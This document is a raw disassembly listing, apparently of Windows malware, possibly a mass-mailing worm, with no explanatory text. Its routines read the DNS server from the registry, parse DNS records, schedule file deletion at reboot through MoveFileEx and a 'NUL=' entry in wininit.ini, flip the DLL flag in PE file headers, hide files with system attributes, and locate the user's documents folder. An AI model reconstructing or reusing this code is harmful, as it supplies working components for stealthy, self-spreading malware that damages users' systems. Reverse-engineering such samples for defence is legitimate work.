36171287 36171289 36171289 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171289 36171289 ; Attributes: bp-based frame 36171289 36171289 sub_36171289 proc near ; CODE XREF: sub_36171000+82p 36171289 36171289 var_204 = byte ptr -204h 36171289 var_2 = word ptr -2 36171289 arg_0 = dword ptr 8 36171289 arg_4 = dword ptr 0Ch 36171289 36171289 push ebp 3617128A mov ebp, esp 3617128C sub esp, 204h 36171292 mov ax, word ptr dot ; "." 36171298 push esi 36171299 push edi 3617129A push 200h 3617129F push [ebp+arg_4] 361712A2 mov [ebp+var_2], ax 361712A6 lea eax, [ebp+var_204] 361712AC xor edi, edi 361712AE push eax 361712AF call ds:strncpy 361712B5 lea eax, [ebp+var_2] 361712B8 push eax 361712B9 lea eax, [ebp+var_204] 361712BF push eax 361712C0 call ds:strtok 361712C6 add esp, 14h 361712C9 mov [ebp+arg_4], eax 361712CC test eax, eax 361712CE jz short loc_3617130D 361712D0 mov esi, [ebp+arg_0] 361712D3 push ebx 361712D4 361712D4 loc_361712D4: ; CODE XREF: sub_36171289+7Fj 361712D4 push [ebp+arg_4] 361712D7 call _strlen 361712DC push [ebp+arg_4] 361712DF mov ebx, eax 361712E1 lea eax, [esi+1] 361712E4 mov [esi], bl 361712E6 push eax 361712E7 call _strcpy 361712EC lea eax, [ebp+var_2] 361712EF lea esi, [esi+ebx+1] 361712F3 push eax 361712F4 push 0 361712F6 lea edi, [edi+ebx+1] 361712FA call ds:strtok 36171300 add esp, 14h 36171303 mov [ebp+arg_4], eax 36171306 test eax, eax 36171308 jnz short loc_361712D4 3617130A pop ebx 3617130B jmp short loc_36171310 3617130D ; ─────────────────────────────────────────────────────────────────────────── 3617130D 3617130D loc_3617130D: ; CODE XREF: sub_36171289+45j 3617130D mov esi, [ebp+arg_0] 36171310 36171310 loc_36171310: ; CODE XREF: sub_36171289+82j 36171310 and byte ptr [esi], 0 36171313 lea eax, [edi+1] 36171316 pop edi 36171317 pop esi 36171318 leave 36171319 retn 36171319 sub_36171289 endp 36171319 3617131A 3617131A ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617131A 3617131A ; Attributes: bp-based frame 3617131A 3617131A sub_3617131A proc near ; CODE XREF: sub_36171000+244p 3617131A 3617131A var_31C = byte ptr -31Ch 3617131A var_212 = dword ptr -212h 3617131A var_110 = byte ptr -110h 3617131A var_10F = byte ptr -10Fh 3617131A var_10 = dword ptr -10h 3617131A var_C = dword ptr -0Ch 3617131A var_8 = dword ptr -8 3617131A var_4 = dword ptr -4 3617131A arg_0 = dword ptr 8 3617131A arg_4 = dword ptr 0Ch 3617131A 3617131A push ebp 3617131B mov ebp, esp 3617131D sub esp, 31Ch 36171323 push ebx 36171324 push esi 36171325 mov esi, [ebp+arg_0] 36171328 push edi 36171329 mov [ebp+var_8], esi 3617132C test byte ptr [esi+3], 0Fh 36171330 jnz short loc_36171382 36171332 cmp word ptr [esi+6], 0 36171337 lea edi, [esi+6] 3617133A mov [ebp+var_C], edi 3617133D jz short loc_36171382 3617133F mov ax, [esi+4] 36171343 lea ebx, [esi+4] 36171346 push eax 36171347 call dword_3617AC34 3617134D mov [ebx], ax 36171350 mov ax, [edi] 36171353 push eax 36171354 call dword_3617AC34 3617135A mov [edi], ax 3617135D mov ax, [esi+8] 36171361 push eax 36171362 call dword_3617AC34 36171368 mov [esi+8], ax 3617136C mov ax, [esi+0Ah] 36171370 push eax 36171371 call dword_3617AC34 36171377 mov [esi+0Ah], ax 3617137B xor eax, eax 3617137D cmp [edi], ax 36171380 jnz short loc_36171389 36171382 36171382 loc_36171382: ; CODE XREF: sub_3617131A+16j 36171382 ; sub_3617131A+23j 36171382 xor eax, eax 36171384 jmp loc_36171489 36171389 ; ─────────────────────────────────────────────────────────────────────────── 36171389 36171389 loc_36171389: ; CODE XREF: sub_3617131A+66j 36171389 add esi, 0Ch 3617138C cmp [ebx], ax 3617138F mov [ebp+arg_0], eax 36171392 jbe short loc_361713E6 36171394 jmp short loc_36171398 36171396 ; ─────────────────────────────────────────────────────────────────────────── 36171396 36171396 loc_36171396: ; CODE XREF: sub_3617131A+C5j 36171396 xor eax, eax 36171398 36171398 loc_36171398: ; CODE XREF: sub_3617131A+7Aj 36171398 mov [ebp+var_10], eax 3617139B mov [ebp+var_4], eax 3617139E mov al, byte_3617A414 361713A3 push 3Fh 361713A5 mov [ebp+var_110], al 361713AB pop ecx 361713AC xor eax, eax 361713AE lea edi, [ebp+var_10F] 361713B4 repe stosd 361713B6 stosw 361713B8 stosb 361713B9 lea eax, [ebp+var_4] 361713BC push eax 361713BD lea eax, [ebp+var_10] 361713C0 push eax 361713C1 lea eax, [ebp+var_110] 361713C7 push eax 361713C8 push esi 361713C9 push [ebp+var_8] 361713CC call sub_36171540 361713D1 add esi, eax 361713D3 add esp, 14h 361713D6 movzx eax, word ptr [ebx] 361713D9 inc [ebp+arg_0] 361713DC cmp [ebp+arg_0], eax 361713DF jl short loc_36171396 361713E1 mov edi, [ebp+var_C] 361713E4 xor eax, eax 361713E6 361713E6 loc_361713E6: ; CODE XREF: sub_3617131A+78j 361713E6 xor ebx, ebx 361713E8 cmp [edi], ax 361713EB mov [ebp+arg_0], eax 361713EE jbe loc_36171486 361713F4 361713F4 loc_361713F4: ; CODE XREF: sub_3617131A+166j 361713F4 lea eax, [ebp+var_31C] 361713FA push eax 361713FB push esi 361713FC push [ebp+var_8] 361713FF call sub_3617158F 36171404 add esp, 0Ch 36171407 add esi, eax 36171409 push [ebp+var_212] 3617140F call dword_3617AC34 36171415 mov [ebp+var_4], eax 36171418 mov al, byte_3617A414 3617141D push 3Fh 3617141F mov [ebp+var_110], al 36171425 pop ecx 36171426 xor eax, eax 36171428 lea edi, [ebp+var_10F] 3617142E repe stosd 36171430 stosw 36171432 stosb 36171433 lea eax, [ebp+var_110] 36171439 push eax 3617143A lea eax, [ebp+var_212+2] 36171440 push eax 36171441 push [ebp+var_8] 36171444 call sub_3617148E 36171449 add esp, 0Ch 3617144C test ebx, ebx 3617144E jz short loc_36171458 36171450 movzx eax, word ptr [ebp+var_4] 36171454 cmp ebx, eax 36171456 jle short loc_36171474 36171458 36171458 loc_36171458: ; CODE XREF: sub_3617131A+134j 36171458 movzx ebx, word ptr [ebp+var_4] 3617145C lea eax, [ebp+var_110] 36171462 push 100h 36171467 push eax 36171468 push [ebp+arg_4] 3617146B call ds:strncpy 36171471 add esp, 0Ch 36171474 36171474 loc_36171474: ; CODE XREF: sub_3617131A+13Cj 36171474 mov eax, [ebp+var_C] 36171477 inc [ebp+arg_0] 3617147A movzx eax, word ptr [eax] 3617147D cmp [ebp+arg_0], eax 36171480 jl loc_361713F4 36171486 36171486 loc_36171486: ; CODE XREF: sub_3617131A+D4j 36171486 push 1 36171488 pop eax 36171489 36171489 loc_36171489: ; CODE XREF: sub_3617131A+6Aj 36171489 pop edi 3617148A pop esi 3617148B pop ebx 3617148C leave 3617148D retn 3617148D sub_3617131A endp 3617148D 3617148E 3617148E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617148E 3617148E ; Attributes: bp-based frame 3617148E 3617148E sub_3617148E proc near ; CODE XREF: sub_3617131A+12Ap 3617148E ; sub_36171540+10p ... 3617148E 3617148E var_204 = byte ptr -204h 3617148E var_203 = byte ptr -203h 3617148E var_4 = dword ptr -4 3617148E arg_0 = dword ptr 8 3617148E arg_4 = dword ptr 0Ch 3617148E arg_8 = dword ptr 10h 3617148E 3617148E push ebp 3617148F mov ebp, esp 36171491 sub esp, 204h 36171497 mov al, byte_3617A414 3617149C push ebx 3617149D push esi 3617149E push edi 3617149F push 7Fh 361714A1 mov [ebp+var_204], al 361714A7 pop ecx 361714A8 xor eax, eax 361714AA lea edi, [ebp+var_203] 361714B0 mov ebx, [ebp+arg_8] 361714B3 repe stosd 361714B5 stosw 361714B7 test ebx, ebx 361714B9 stosb 361714BA jnz short loc_361714C2 361714BC lea ebx, [ebp+var_204] 361714C2 361714C2 loc_361714C2: ; CODE XREF: sub_3617148E+2Cj 361714C2 and [ebp+arg_8], 0 361714C6 and [ebp+var_4], 0 361714CA mov esi, [ebp+arg_4] 361714CD 361714CD loc_361714CD: ; CODE XREF: sub_3617148E+61j 361714CD ; sub_3617148E+6Ej ... 361714CD mov al, [esi] 361714CF test al, al 361714D1 jz short loc_3617152E 361714D3 test al, 0C0h 361714D5 jz short loc_361714FE 361714D7 mov ax, [esi] 361714DA and ax, 0FF3Fh 361714DE push eax 361714DF call dword_3617AC34 361714E5 movzx esi, ax 361714E8 add esi, [ebp+arg_0] 361714EB cmp [ebp+var_4], 0 361714EF jnz short loc_361714CD 361714F1 add [ebp+arg_8], 2 361714F5 mov [ebp+var_4], 1 361714FC jmp short loc_361714CD 361714FE ; ─────────────────────────────────────────────────────────────────────────── 361714FE 361714FE loc_361714FE: ; CODE XREF: sub_3617148E+47j 361714FE movzx edi, al 36171501 lea eax, [esi+1] 36171504 push edi 36171505 push eax 36171506 push ebx 36171507 call _memcpy 3617150C lea eax, [edi+ebx] 3617150F add esp, 0Ch 36171512 cmp dword ptr [ebp-4], 0 36171516 mov byte ptr [eax], 2Eh 36171519 lea ebx, [eax+1] 3617151C jnz short loc_36171528 3617151E mov eax, [ebp+10h] 36171521 lea eax, [eax+edi+1] 36171525 mov [ebp+10h], eax 36171528 36171528 loc_36171528: ; CODE XREF: sub_3617148E+8Ej 36171528 lea esi, [esi+edi+1] 3617152C jmp short loc_361714CD 3617152E ; ─────────────────────────────────────────────────────────────────────────── 3617152E 3617152E loc_3617152E: ; CODE XREF: sub_3617148E+43j 3617152E and byte ptr [ebx], 0 36171531 cmp dword ptr [ebp-4], 0 36171535 mov eax, [ebp+10h] 36171538 pop edi 36171539 pop esi 3617153A pop ebx 3617153B jnz short locret_3617153E 3617153D inc eax 3617153E 3617153E locret_3617153E: ; CODE XREF: sub_3617148E+ADj 3617153E leave 3617153F retn 3617153F sub_3617148E endp 3617153F 36171540 36171540 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171540 36171540 ; Attributes: bp-based frame 36171540 36171540 sub_36171540 proc near ; CODE XREF: sub_3617131A+B2p 36171540 36171540 arg_0 = dword ptr 8 36171540 arg_4 = dword ptr 0Ch 36171540 arg_8 = dword ptr 10h 36171540 arg_C = dword ptr 14h 36171540 arg_10 = dword ptr 18h 36171540 36171540 push ebp 36171541 mov ebp, esp 36171543 push ebx 36171544 push esi 36171545 mov esi, [ebp+0Ch] 36171548 push edi 36171549 push dword ptr [ebp+10h] 3617154C push esi 3617154D push dword ptr [ebp+8] 36171550 call sub_3617148E 36171555 mov ebx, [ebp+14h] 36171558 mov edi, eax 3617155A add esp, 0Ch 3617155D add esi, edi 3617155F test ebx, ebx 36171561 jz short loc_36171570 36171563 mov ax, [esi] 36171566 push eax 36171567 call dword_3617AC34 3617156D mov [ebx], ax 36171570 36171570 loc_36171570: ; CODE XREF: sub_36171540+21j 36171570 mov ebx, [ebp+arg_10] 36171573 inc edi 36171574 inc edi 36171575 test ebx, ebx 36171577 jz short loc_36171587 36171579 mov ax, [esi+2] 3617157D push eax 3617157E call dword_3617AC34 36171584 mov [ebx], ax 36171587 36171587 loc_36171587: ; CODE XREF: sub_36171540+37j 36171587 lea eax, [edi+2] 3617158A pop edi 3617158B pop esi 3617158C pop ebx 3617158D pop ebp 3617158E retn 3617158E sub_36171540 endp ; sp = -8 3617158E 3617158F 3617158F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617158F 3617158F ; Attributes: bp-based frame 3617158F 3617158F sub_3617158F proc near ; CODE XREF: sub_3617131A+E5p 3617158F 3617158F arg_0 = dword ptr 8 3617158F arg_4 = dword ptr 0Ch 3617158F arg_8 = dword ptr 10h 3617158F 3617158F push ebp 36171590 mov ebp, esp 36171592 push ebx 36171593 push esi 36171594 mov esi, [ebp+arg_8] 36171597 push edi 36171598 test esi, esi 3617159A jz short loc_361715AC 3617159C push 20Ch 361715A1 push 0 361715A3 push esi 361715A4 call _memset 361715A9 add esp, 0Ch 361715AC 361715AC loc_361715AC: ; CODE XREF: sub_3617158F+Bj 361715AC mov edi, [ebp+arg_4] 361715AF push esi 361715B0 push edi 361715B1 push [ebp+arg_0] 361715B4 call sub_3617148E 361715B9 mov ebx, eax 361715BB add esp, 0Ch 361715BE add edi, ebx 361715C0 test esi, esi 361715C2 jz short loc_361715D5 361715C4 mov ax, [edi] 361715C7 push eax 361715C8 call dword_3617AC34 361715CE mov [esi+100h], ax 361715D5 361715D5 loc_361715D5: ; CODE XREF: sub_3617158F+33j 361715D5 inc edi 361715D6 inc edi 361715D7 inc ebx 361715D8 inc ebx 361715D9 test esi, esi 361715DB jz short loc_361715EE 361715DD mov ax, [edi] 361715E0 push eax 361715E1 call dword_3617AC34 361715E7 mov [esi+102h], ax 361715EE 361715EE loc_361715EE: ; CODE XREF: sub_3617158F+4Cj 361715EE inc edi 361715EF inc edi 361715F0 inc ebx 361715F1 inc ebx 361715F2 test esi, esi 361715F4 jz short loc_36171604 361715F6 push dword ptr [edi] 361715F8 call dword_3617AC30 361715FE mov [esi+104h], eax 36171604 36171604 loc_36171604: ; CODE XREF: sub_3617158F+65j 36171604 mov ax, [edi+4] 36171608 add edi, 4 3617160B push eax 3617160C add ebx, 4 3617160F call dword_3617AC34 36171615 test esi, esi 36171617 mov [ebp+arg_8], eax 3617161A jz short loc_36171623 3617161C mov [esi+108h], ax 36171623 36171623 loc_36171623: ; CODE XREF: sub_3617158F+8Bj 36171623 inc ebx 36171624 inc ebx 36171625 test esi, esi 36171627 jz short loc_36171640 36171629 movzx eax, ax 3617162C add edi, 2 3617162F push eax 36171630 add esi, 10Ah 36171636 push edi 36171637 push esi 36171638 call _memcpy 3617163D add esp, 0Ch 36171640 36171640 loc_36171640: ; CODE XREF: sub_3617158F+98j 36171640 movzx eax, word ptr [ebp+arg_8] 36171644 pop edi 36171645 add eax, ebx 36171647 pop esi 36171648 pop ebx 36171649 pop ebp 3617164A retn 3617164A sub_3617158F endp ; sp = -10h 3617164A 3617164B 3617164B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617164B 3617164B ; Attributes: bp-based frame 3617164B 3617164B sub_3617164B proc near ; CODE XREF: sub_361766AC+9p 3617164B 3617164B var_698 = byte ptr -698h 3617164B var_298 = byte ptr -298h 3617164B var_198 = byte ptr -198h 3617164B var_98 = byte ptr -98h 3617164B var_18 = dword ptr -18h 3617164B var_14 = dword ptr -14h 3617164B var_10 = dword ptr -10h 3617164B var_C = dword ptr -0Ch 3617164B var_8 = dword ptr -8 3617164B var_4 = dword ptr -4 3617164B 3617164B push ebp 3617164C mov ebp, esp 3617164E sub esp, 698h 36171654 push ebx 36171655 xor ebx, ebx 36171657 cmp dword_3617ACB0, ebx 3617165D mov [ebp+var_98], bl 36171663 jz loc_361717BB 36171669 lea eax, [ebp+var_18] 3617166C mov [ebp+var_18], ebx 3617166F push eax 36171670 lea eax, [ebp+var_4] 36171673 push eax 36171674 push ebx 36171675 push 0F003Fh 3617167A push ebx 3617167B push ebx 3617167C push ebx 3617167D push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Tcpip"... 36171682 push 80000002h 36171687 call ds:RegCreateKeyExA 3617168D test eax, eax 3617168F jnz loc_3617184E 36171695 push esi 36171696 push ebx 36171697 push ebx 36171698 push ebx 36171699 lea eax, [ebp+var_14] 3617169C mov esi, ds:RegEnumKeyExA 361716A2 push ebx 361716A3 push eax 361716A4 lea eax, [ebp+var_298] 361716AA mov [ebp+var_14], 0FFh 361716B1 push eax 361716B2 push ebx 361716B3 push [ebp+var_4] 361716B6 mov [ebp+var_C], ebx 361716B9 361716B9 loc_361716B9: ; CODE XREF: sub_3617164B+120j 361716B9 call esi ; RegEnumKeyExA 361716BB test eax, eax 361716BD jnz loc_361717AC 361716C3 lea eax, [ebp+var_198] 361716C9 push offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services\\Tcpip"... 361716CE push eax 361716CF call _strcpy 361716D4 lea eax, [ebp+var_298] 361716DA push eax 361716DB lea eax, [ebp+var_198] 361716E1 push eax 361716E2 call _strcat 361716E7 add esp, 10h 361716EA lea eax, [ebp+var_8] 361716ED push eax 361716EE push 0F003Fh 361716F3 lea eax, [ebp+var_198] 361716F9 push ebx 361716FA push eax 361716FB push 80000002h 36171700 call ds:RegOpenKeyExA 36171706 test eax, eax 36171708 jnz short loc_3617174C 3617170A lea eax, [ebp+var_10] 3617170D mov [ebp+var_10], 400h 36171714 push eax 36171715 lea eax, [ebp+var_698] 3617171B push eax 3617171C push ebx 3617171D push ebx 3617171E push offset aNameserver ; "NameServer" 36171723 push [ebp+var_8] 36171726 mov [ebp+var_698], bl 3617172C call ds:RegQueryValueExA 36171732 lea eax, [ebp+var_698] 36171738 push eax 36171739 call _strlen 3617173E test eax, eax 36171740 pop ecx 36171741 jnz short loc_36171770 36171743 push [ebp+var_8] 36171746 call ds:RegCloseKey 3617174C 3617174C loc_3617174C: ; CODE XREF: sub_3617164B+BDj 3617174C inc [ebp+var_C] 3617174F push ebx 36171750 push ebx 36171751 push ebx 36171752 lea eax, [ebp+var_14] 36171755 push ebx 36171756 push eax 36171757 lea eax, [ebp+var_298] 3617175D push eax 3617175E mov [ebp+var_14], 0FFh 36171765 push [ebp+var_C] 36171768 push [ebp+var_4] 3617176B jmp loc_361716B9 36171770 ; ─────────────────────────────────────────────────────────────────────────── 36171770 36171770 loc_36171770: ; CODE XREF: sub_3617164B+F6j 36171770 lea eax, [ebp+var_698] 36171776 push 2Ch 36171778 push eax 36171779 call ds:strchr 3617177F pop ecx 36171780 cmp eax, ebx 36171782 pop ecx 36171783 jz short loc_36171787 36171785 mov [eax], bl 36171787 36171787 loc_36171787: ; CODE XREF: sub_3617164B+138j 36171787 lea eax, [ebp+var_698] 3617178D push 80h 36171792 push eax 36171793 lea eax, [ebp+var_98] 36171799 push eax 3617179A call ds:strncpy 361717A0 add esp, 0Ch 361717A3 push [ebp+var_8] 361717A6 call ds:RegCloseKey 361717AC 361717AC loc_361717AC: ; CODE XREF: sub_3617164B+72j 361717AC push [ebp+var_4] 361717AF call ds:RegCloseKey 361717B5 pop esi 361717B6 jmp loc_3617184E 361717BB ; ─────────────────────────────────────────────────────────────────────────── 361717BB 361717BB loc_361717BB: ; CODE XREF: sub_3617164B+18j 361717BB lea eax, [ebp+var_4] 361717BE push eax 361717BF push 0F003Fh 361717C4 push ebx 361717C5 push offset aSystemCurren_1 ; "System\\CurrentControlSet\\Services\\VxD\\M"... 361717CA push 80000002h 361717CF call ds:RegOpenKeyExA 361717D5 test eax, eax 361717D7 jnz short loc_3617184E 361717D9 lea eax, [ebp+var_10] 361717DC mov [ebp+var_10], 400h 361717E3 push eax 361717E4 lea eax, [ebp+var_698] 361717EA push eax 361717EB push ebx 361717EC push ebx 361717ED push offset aNameserver ; "NameServer" 361717F2 push [ebp+var_4] 361717F5 mov [ebp+var_698], bl 361717FB call ds:RegQueryValueExA 36171801 lea eax, [ebp+var_698] 36171807 push eax 36171808 call _strlen 3617180D test eax, eax 3617180F pop ecx 36171810 jz short loc_36171845 36171812 lea eax, [ebp+var_698] 36171818 push 2Ch 3617181A push eax 3617181B call ds:strchr 36171821 pop ecx 36171822 cmp eax, ebx 36171824 pop ecx 36171825 jz short loc_36171829 36171827 mov [eax], bl 36171829 36171829 loc_36171829: ; CODE XREF: sub_3617164B+1DAj 36171829 lea eax, [ebp+var_698] 3617182F push 80h 36171834 push eax 36171835 lea eax, [ebp+var_98] 3617183B push eax 3617183C call ds:strncpy 36171842 add esp, 0Ch 36171845 36171845 loc_36171845: ; CODE XREF: sub_3617164B+1C5j 36171845 push [ebp+var_4] 36171848 call ds:RegCloseKey 3617184E 3617184E loc_3617184E: ; CODE XREF: sub_3617164B+44j 3617184E ; sub_3617164B+16Bj ... 3617184E cmp [ebp+var_98], bl 36171854 pop ebx 36171855 jz short loc_36171869 36171857 lea eax, [ebp+var_98] 3617185D push eax 3617185E call dword_3617AC28 36171864 mov dword_3617A410, eax 36171869 36171869 loc_36171869: ; CODE XREF: sub_3617164B+20Aj 36171869 push 1 3617186B pop eax 3617186C leave 3617186D retn 3617186D sub_3617164B endp 3617186D 3617186E 3617186E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617186E 3617186E 3617186E sub_3617186E proc near ; CODE XREF: sub_36171B36+3Ap 3617186E ; sub_3617339F+47p ... 3617186E 3617186E arg_0 = dword ptr 8 3617186E 3617186E push esi 3617186F mov esi, [esp+arg_0] 36171873 test esi, esi 36171875 jz short loc_3617188D 36171877 push esi 36171878 call _strlen 3617187D test eax, eax 3617187F pop ecx 36171880 jz short loc_3617188D 36171882 cmp byte ptr [eax+esi-1], 5Ch 36171887 lea eax, [eax+esi-1] 3617188B jz short loc_36171891 3617188D 3617188D loc_3617188D: ; CODE XREF: sub_3617186E+7j 3617188D ; sub_3617186E+12j 3617188D xor eax, eax 3617188F pop esi 36171890 retn 36171891 ; ─────────────────────────────────────────────────────────────────────────── 36171891 36171891 loc_36171891: ; CODE XREF: sub_3617186E+1Dj 36171891 and byte ptr [eax], 0 36171894 push 1 36171896 pop eax 36171897 pop esi 36171898 retn 36171898 sub_3617186E endp 36171898 36171899 36171899 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171899 36171899 ; Attributes: bp-based frame 36171899 36171899 sub_36171899 proc near ; CODE XREF: sub_36174125+1DCp 36171899 ; sub_36176511+18Dp ... 36171899 36171899 var_404 = byte ptr -404h 36171899 var_4 = byte ptr -4 36171899 arg_0 = dword ptr 8 36171899 36171899 push ebp 3617189A mov ebp, esp 3617189C sub esp, 404h 361718A2 push ebx 361718A3 push edi 361718A4 xor edi, edi 361718A6 cmp dword_3617ACB0, edi 361718AC jz short loc_361718C2 361718AE push 4 361718B0 push edi 361718B1 push [ebp+arg_0] 361718B4 call ds:MoveFileExA 361718BA push 1 361718BC pop eax 361718BD jmp loc_3617199F 361718C2 ; ─────────────────────────────────────────────────────────────────────────── 361718C2 361718C2 loc_361718C2: ; CODE XREF: sub_36171899+13j 361718C2 lea eax, [ebp+var_404] 361718C8 push offset byte_3617B0B8 361718CD push eax 361718CE call _strcpy 361718D3 lea eax, [ebp+var_404] 361718D9 push offset wininit_ini ; "\\wininit.ini" 361718DE push eax 361718DF call _strcat 361718E4 add esp, 10h 361718E7 lea eax, [ebp+var_404] 361718ED push edi 361718EE push 80h 361718F3 push 4 361718F5 push edi 361718F6 push edi 361718F7 push 40000000h 361718FC push eax 361718FD call ds:CreateFileA 36171903 mov ebx, eax 36171905 cmp ebx, 0FFFFFFFFh 36171908 jz loc_3617199D 3617190E push esi 3617190F push 2 36171911 push edi 36171912 push edi 36171913 push ebx 36171914 call ds:SetFilePointer 3617191A lea eax, [ebp+var_404] 36171920 push offset aRename ; "\r\n\r\n[rename]\r\n" 36171925 push eax 36171926 call _strcpy 3617192B pop ecx 3617192C lea eax, [ebp+var_4] 3617192F pop ecx 36171930 push edi 36171931 push eax 36171932 lea eax, [ebp+var_404] 36171938 push eax 36171939 call _strlen 3617193E mov esi, ds:WriteFile 36171944 pop ecx 36171945 push eax 36171946 lea eax, [ebp+var_404] 3617194C push eax 3617194D push ebx 3617194E call esi ; WriteFile 36171950 lea eax, [ebp+var_404] 36171956 push offset NUL_equals ; "NUL=" 3617195B push eax 3617195C call _strcpy 36171961 push [ebp+arg_0] 36171964 lea eax, [ebp+var_404] 3617196A push eax 3617196B call _strcat 36171970 add esp, 10h 36171973 lea eax, [ebp+var_4] 36171976 push edi 36171977 push eax 36171978 lea eax, [ebp+var_404] 3617197E push eax 3617197F call _strlen 36171984 pop ecx 36171985 push eax 36171986 lea eax, [ebp+var_404] 3617198C push eax 3617198D push ebx 3617198E call esi ; WriteFile 36171990 push ebx 36171991 call ds:CloseHandle 36171997 push 1 36171999 pop eax 3617199A pop esi 3617199B jmp short loc_3617199F 3617199D ; ─────────────────────────────────────────────────────────────────────────── 3617199D 3617199D loc_3617199D: ; CODE XREF: sub_36171899+6Fj 3617199D xor eax, eax 3617199F 3617199F loc_3617199F: ; CODE XREF: sub_36171899+24j 3617199F ; sub_36171899+102j 3617199F pop edi 361719A0 pop ebx 361719A1 leave 361719A2 retn 361719A2 sub_36171899 endp 361719A2 361719A3 361719A3 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361719A3 361719A3 ; Attributes: bp-based frame 361719A3 361719A3 sub_361719A3 proc near ; CODE XREF: sub_36176511+11Dp 361719A3 ; sub_361766AC+8Fp ... 361719A3 361719A3 var_140 = byte ptr -140h 361719A3 var_12A = word ptr -12Ah 361719A3 var_48 = byte ptr -48h 361719A3 var_C = dword ptr -0Ch 361719A3 var_8 = dword ptr -8 361719A3 var_4 = dword ptr -4 361719A3 arg_0 = dword ptr 8 361719A3 arg_4 = dword ptr 0Ch 361719A3 361719A3 push ebp 361719A4 mov ebp, esp 361719A6 sub esp, 140h 361719AC push esi 361719AD push edi 361719AE push 80h 361719B3 push [ebp+arg_0] 361719B6 call ds:SetFileAttributesA 361719BC xor esi, esi 361719BE push esi 361719BF push esi 361719C0 push 3 361719C2 push esi 361719C3 push esi 361719C4 push 0C0000000h 361719C9 push [ebp+arg_0] 361719CC call ds:CreateFileA 361719D2 mov edi, eax 361719D4 cmp edi, 0FFFFFFFFh 361719D7 mov [ebp+var_8], edi 361719DA jnz short loc_361719E3 361719DC xor eax, eax 361719DE jmp loc_36171A77 361719E3 ; ─────────────────────────────────────────────────────────────────────────── 361719E3 361719E3 loc_361719E3: ; CODE XREF: sub_361719A3+37j 361719E3 push ebx 361719E4 lea eax, [ebp+var_4] 361719E7 push esi 361719E8 push eax 361719E9 lea eax, [ebp+var_48] 361719EC push 40h 361719EE push eax 361719EF push edi 361719F0 mov [ebp+var_4], esi 361719F3 call ds:ReadFile 361719F9 push esi 361719FA push esi 361719FB push [ebp+var_C] 361719FE push edi 361719FF mov edi, ds:SetFilePointer 36171A05 call edi ; SetFilePointer 36171A07 lea eax, [ebp+var_4] 36171A0A push esi 36171A0B push eax 36171A0C mov ebx, 0F8h 36171A11 lea eax, [ebp+var_140] 36171A17 push ebx 36171A18 push eax 36171A19 mov [ebp+var_4], esi 36171A1C push [ebp+var_8] 36171A1F call ds:ReadFile 36171A25 cmp [ebp+arg_4], esi 36171A28 jz short loc_36171A35 36171A2A and [ebp+var_12A], 0DFFFh 36171A33 jmp short loc_36171A3C 36171A35 ; ─────────────────────────────────────────────────────────────────────────── 36171A35 36171A35 loc_36171A35: ; CODE XREF: sub_361719A3+85j 36171A35 or byte ptr [ebp+var_12A+1], 20h 36171A3C 36171A3C loc_36171A3C: ; CODE XREF: sub_361719A3+90j 36171A3C push esi 36171A3D push esi 36171A3E push [ebp+var_C] 36171A41 push [ebp+var_8] 36171A44 call edi ; SetFilePointer 36171A46 lea eax, [ebp+var_4] 36171A49 push esi 36171A4A push eax 36171A4B lea eax, [ebp+var_140] 36171A51 push ebx 36171A52 push eax 36171A53 push [ebp+var_8] 36171A56 mov [ebp+var_4], esi 36171A59 call ds:WriteFile 36171A5F push [ebp+var_8] 36171A62 call ds:CloseHandle 36171A68 push 26h 36171A6A push [ebp+arg_0] 36171A6D call ds:SetFileAttributesA 36171A73 push 1 36171A75 pop eax 36171A76 pop ebx 36171A77 36171A77 loc_36171A77: ; CODE XREF: sub_361719A3+3Bj 36171A77 pop edi 36171A78 pop esi 36171A79 leave 36171A7A retn 36171A7A sub_361719A3 endp 36171A7A 36171A7B 36171A7B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171A7B 36171A7B ; Attributes: bp-based frame 36171A7B 36171A7B sub_36171A7B proc near ; CODE XREF: sub_36174374+Ap 36171A7B ; sub_36175F1C+13p 36171A7B 36171A7B var_208 = byte ptr -208h 36171A7B var_8 = dword ptr -8 36171A7B var_4 = dword ptr -4 36171A7B 36171A7B push ebp 36171A7C mov ebp, esp 36171A7E sub esp, 208h 36171A84 lea eax, [ebp+var_4] 36171A87 push esi 36171A88 xor esi, esi 36171A8A push eax 36171A8B push 0F003Fh 36171A90 push esi 36171A91 push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"... 36171A96 push 80000001h 36171A9B mov [ebp+var_8], 1FFh 36171AA2 call ds:RegOpenKeyExA 36171AA8 test eax, eax 36171AAA jz short loc_36171AAF 36171AAC push 1 36171AAE pop esi 36171AAF 36171AAF loc_36171AAF: ; CODE XREF: sub_36171A7B+2Fj 36171AAF lea eax, [ebp+var_8] 36171AB2 push eax 36171AB3 lea eax, [ebp+var_208] 36171AB9 push eax 36171ABA push 0 36171ABC push 0 36171ABE push offset aPersonal ; "Personal" 36171AC3 push [ebp+var_4] 36171AC6 call ds:RegQueryValueExA 36171ACC test eax, eax 36171ACE jz short loc_36171AD3 36171AD0 push 1 36171AD2 pop esi 36171AD3 36171AD3 loc_36171AD3: ; CODE XREF: sub_36171A7B+53j 36171AD3 test esi, esi 36171AD5 pop esi 36171AD6 jz short loc_36171AEB 36171AD8 lea eax, [ebp+var_208] 36171ADE push offset aC ; "C:\\" 36171AE3 push eax 36171AE4 call _strcpy 36171AE9 pop ecx 36171AEA pop ecx 36171AEB 36171AEB loc_36171AEB: ; CODE XREF: sub_36171A7B+5Bj 36171AEB push [ebp+var_4] 36171AEE call ds:RegCloseKey 36171AF4 lea eax, [ebp+var_208] 36171AFA push eax 36171AFB call random_numgen 36171B00 pop ecx 36171B01 push 1 36171B03 pop eax 36171B04 leave 36171B05 retn 36171B05 sub_36171A7B endp 36171B05 36171B06 36171B06 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171B06 36171B06 36171B06 